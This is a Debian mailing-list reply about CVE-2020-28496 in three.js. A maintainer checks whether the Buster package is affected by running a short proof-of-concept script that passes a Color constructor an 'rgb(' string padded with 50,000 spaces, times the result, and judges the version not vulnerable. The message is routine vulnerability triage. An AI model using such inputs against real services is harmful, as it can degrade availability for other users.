[Pkg-javascript-devel] Bug#988726: Bug#988726: CVE-2020-28496
Yadd
yadd at debian.org
Tue May 18 20:04:09 BST 2021
Le 18/05/2021 à 20:28, Moritz Muehlenhoff a écrit :
> Source: three.js
> Severity: important
> Tags: security
> X-Debbugs-Cc: Debian Security Team <team at security.debian.org>
>
> This was assigned CVE-2020-28496:
> https://github.com/mrdoob/three.js/issues/21132
> https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
>
> Cheers,
> Moritz
Hi,
vulnerable code seems not present in version 111.
Tested with PoC code:
var three = require('.')
function build_blank (n) {
var ret = "rgb("
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
Result is 1945 ms so three.js seems not vulnerable, at least in Buster
Cheers,
Yadd
More information about the Pkg-javascript-devel
mailing list